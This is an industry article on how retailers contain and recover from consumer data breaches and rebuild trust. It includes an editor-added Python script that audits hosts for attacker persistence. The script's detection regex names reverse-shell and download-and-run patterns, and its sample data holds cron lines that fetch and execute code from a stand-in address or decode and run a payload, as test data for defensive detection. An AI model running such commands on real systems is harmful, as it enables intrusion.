
How retailers can rebuild trust after a consumer data breach


Retailers have spent decades expanding their digital capabilities to keep up with consumer demand for richer shopping experiences.

But rapid digital transformation has also created considerable cybersecurity risk for retail enterprises and their customers, and the industry has been a frequent target in recent years.

Some experts suggest that 84% of retail organizations are at risk of cyberattack, making retail the third-most targeted industry after financial services and healthcare. Each incident also costs retailers time and money: companies spend an average of $2.5 million per incident and take roughly 197 days to detect a breach.

Despite these shocking statistics, many retail enterprises have struggled to revamp their cyber strategies. Some organizations don’t know where to start. Others may not think the business risk warrants increased investment. But with mounting regulatory scrutiny from agencies like the Federal Trade Commission and equally increasing concern from the public, retailers need to bolster their cybersecurity agendas.

Security gaps and threat vectors

The majority of retail breaches stem from poor security hygiene. Microsoft estimates that basic hygiene protects against 99% of attacks: enabling multi-factor authentication (MFA), applying zero-trust principles, deploying extended detection and response (XDR) and anti-malware tooling, keeping systems patched, and protecting data.

Retailers have inadvertently created gaps across their value chains and channels due to a lack of critical controls. And cyber criminals are well aware of the cracks in retailers’ armor. Over 10% of all attacks in 2023 targeted retailers and wholesalers.

These attacks occur on multiple digital fronts. E-commerce and social commerce platforms are targeted through known vulnerabilities in their application programming interfaces (APIs) and web applications. Against online shoppers, threat actors typically use look-alike websites, phishing, and adversary-in-the-middle proxies that capture credentials and session tokens (and so defeat one-time-code MFA unless phishing-resistant factors are used) to take over accounts and harvest personal information such as card details.

Cyberattacks can also occur in physical storefronts, especially at cashier-less kiosks and other unattended payment terminals, where criminals attach skimmers to capture card data as it is read. While many attacks target consumers in the hope of obtaining personal data, retailers' own employees, supply chain vendors, IT providers, and partners may also be victims.

Weak passwords and credentials, single-factor authentication, exposed remote-access and remote-support tools, outdated software, open or misconfigured ports and cloud services, missing endpoint detection and response (EDR), and unprotected networks are just some of the ways threat actors gain access. And because business is interconnected and digitally driven, once one company is compromised, every other company in its partner ecosystem may be at risk too.


Regardless of how an attack occurred, once consumer data is compromised retailers must act quickly. The first priority is containment: isolating affected systems, revoking compromised credentials and sessions, and closing the attacker's access paths while preserving logs and disk images for the investigation. Most retailers will want a specialized incident-response vendor to help assess the extent of the intrusion and secure the network, since the initial point of entry is rarely the only one.

Beyond the technical response handled by the technology teams, retailers also must limit the fallout in other ways. Communications teams should provide regular and transparent updates to the necessary stakeholders, above all customers, to restore trust. Legal and compliance teams must notify regulators and affected individuals within the deadlines that apply to them.

Depending on the type and reach of the breach, retailers should open lines of communication with vendors and partners. This is essential whenever consumer financial information is compromised: the retailer will need to work with its acquirer and payment processors on the investigation, and the card brands may require one by a PCI Forensic Investigator (PFI). Financial institutions often send updates and suggested next steps to cardholders affected by such attacks; going forward, retailers would do well to take on that responsibility themselves in order to rebuild consumer trust.

Long-term tactics

Even when cyberattacks are finally stopped, the work does not end there. Retailers and their consumers will unfortunately continue to be targeted by threat actors. As any leader who has dealt with a cyberattack knows, just one breach can be costly and wreak reputational havoc. Retail enterprises must spend the time and money to ensure their cybersecurity posture is strengthened and such breaches do not occur again.

Organizations that have experienced a breach should work from their incident-response vendor's report. Internal security teams should then run their own assessment of the entire enterprise environment, because attackers often leave behind persistence such as additional accounts, SSH keys, scheduled tasks or web shells, and then build a remediation roadmap from the findings: establishing new controls, closing the remaining gaps, and locking down internet-facing and edge services.
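As an added illustration of the kind of post-breach check described above (this is the editor's example, not code from the author or Capgemini), the following Python sweeps three common Linux persistence locations for leftovers an attacker might have planted: extra UID 0 accounts in the password file, SSH keys that are not on a pre-incident allowlist, and cron entries that download-and-execute, decode an embedded payload, or open a reverse shell. The allowlist, the key blobs, the 198.51.100.7 address and every sample line are constructed for illustration; a real sweep diffs against a baseline captured before the incident and is one small part of the broader assessment.

```python
import base64
import hashlib
import re
from typing import List, Set

# Added example by the editor; not code from the author or Capgemini. A minimal
# post-incident persistence sweep over three host artifacts: the account list,
# SSH authorized_keys and cron entries. The allowlist and every sample input are
# constructed for illustration.

# Patterns common in cron-based backdoors: download-and-execute, encoded
# payloads, and reverse shells.
SUSPICIOUS_CRON = re.compile(
    r"(curl|wget)[^|]*\|\s*(ba)?sh\b"
    r"|base64\s+(-d|--decode)\b"
    r"|\bnc\b.*\s-e\s"
    r"|/dev/tcp/"
)


def ssh_fingerprint(blob_b64: str) -> str:
    """OpenSSH-style SHA256 fingerprint of a base64 key blob (padding stripped)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def audit_passwd(passwd_text: str) -> List[str]:
    """Flag any account other than root that has UID 0."""
    findings = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            findings.append(f"passwd: account {fields[0]!r} has UID 0")
    return findings


def audit_authorized_keys(keys_text: str, allowed: Set[str]) -> List[str]:
    """Flag keys whose fingerprint is not in the pre-incident allowlist."""
    findings = []
    for line in keys_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        parts = line.split()
        # Key options such as command="..." may precede the key type.
        idx = next((i for i, p in enumerate(parts)
                    if p.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if idx is None or idx + 1 >= len(parts):
            continue
        fp = ssh_fingerprint(parts[idx + 1])
        if fp not in allowed:
            comment = " ".join(parts[idx + 2:]) or "(no comment)"
            findings.append(f"authorized_keys: unknown key {fp} {comment}")
    return findings


def audit_cron(cron_text: str) -> List[str]:
    """Flag cron entries that match the backdoor patterns above."""
    return [f"cron: suspicious entry {line.strip()!r}"
            for line in cron_text.splitlines()
            if line.strip() and not line.lstrip().startswith("#")
            and SUSPICIOUS_CRON.search(line)]


def sweep(passwd_text: str, keys_text: str, cron_text: str, allowed: Set[str]) -> List[str]:
    """Run all three audits and return the combined findings."""
    return (audit_passwd(passwd_text)
            + audit_authorized_keys(keys_text, allowed)
            + audit_cron(cron_text))


# --- constructed sample data (not real keys, hosts or crontabs) ---
KNOWN_BLOB = base64.b64encode(b"constructed key material, not a real key").decode()
ROGUE_BLOB = base64.b64encode(b"constructed attacker key, not a real key").decode()
ALLOWED_FINGERPRINTS = {ssh_fingerprint(KNOWN_BLOB)}

SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    "svc_backup:x:0:0:backup:/var/backups:/bin/bash\n"
)
SAMPLE_KEYS = (
    f"ssh-ed25519 {KNOWN_BLOB} alice@laptop\n"
    f'command="/bin/sh" ssh-rsa {ROGUE_BLOB} support\n'
)
SAMPLE_CRON = (
    "0 3 * * * /usr/local/bin/backup.sh\n"
    "*/5 * * * * curl -s http://198.51.100.7/a | sh\n"   # TEST-NET-2 address
    "@reboot echo aGVsbG8= | base64 -d | sh\n"
)

if __name__ == "__main__":
    for finding in sweep(SAMPLE_PASSWD, SAMPLE_KEYS, SAMPLE_CRON, ALLOWED_FINGERPRINTS):
        print(finding)
```

Run on the constructed sample it reports four findings: the second UID 0 account, the key that is not on the allowlist (note the `command=` option in front of it, which is why the parser looks for the key type rather than assuming it is the first field), and the two cron lines. Windows hosts need the equivalent sweep over local administrators, scheduled tasks, services and Run keys.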

Another key element of a post-breach roadmap is security technology. Every retailer should work towards a zero-trust posture. Zero trust is an architecture rather than a product: every request is authenticated and authorized on the basis of identity and device posture, and that depends on a well-integrated set of tools whose telemetry can be correlated so that threats are detected and responses automated across identity, endpoint, network and cloud.

Retailers cannot forget to look outside their own environment and consider the risks external parties pose to them, as well as the risks they expose others to. Companies should impose security posture requirements on third-party partners, particularly those delivering end-to-end services. Similarly, retailers should enforce stronger password requirements on customer accounts or, better still, MFA.

These tactics aren't just suggestions. Retailers should expect greater scrutiny from cybersecurity regulators and industry bodies. The PCI Security Standards Council has already published the latest version of its Payment Card Industry Data Security Standard, PCI DSS v4.0: v3.2.1 was retired on 31 March 2024, and the remaining future-dated v4.0 requirements become mandatory on 31 March 2025.

The SEC, FTC, and numerous states have also tightened their requirements to protect consumers as cybercrime continues to increase; the SEC's 2023 disclosure rules, for example, require public companies to report a material cybersecurity incident on Form 8-K within four business days of determining that it is material. Retailers already face a growing variety of business risks in today's market, and they can do more to mitigate their cyber risks and protect their customers.


Sushila Nair

Sushila Nair is VP, North America head of cybersecurity practice at Capgemini.

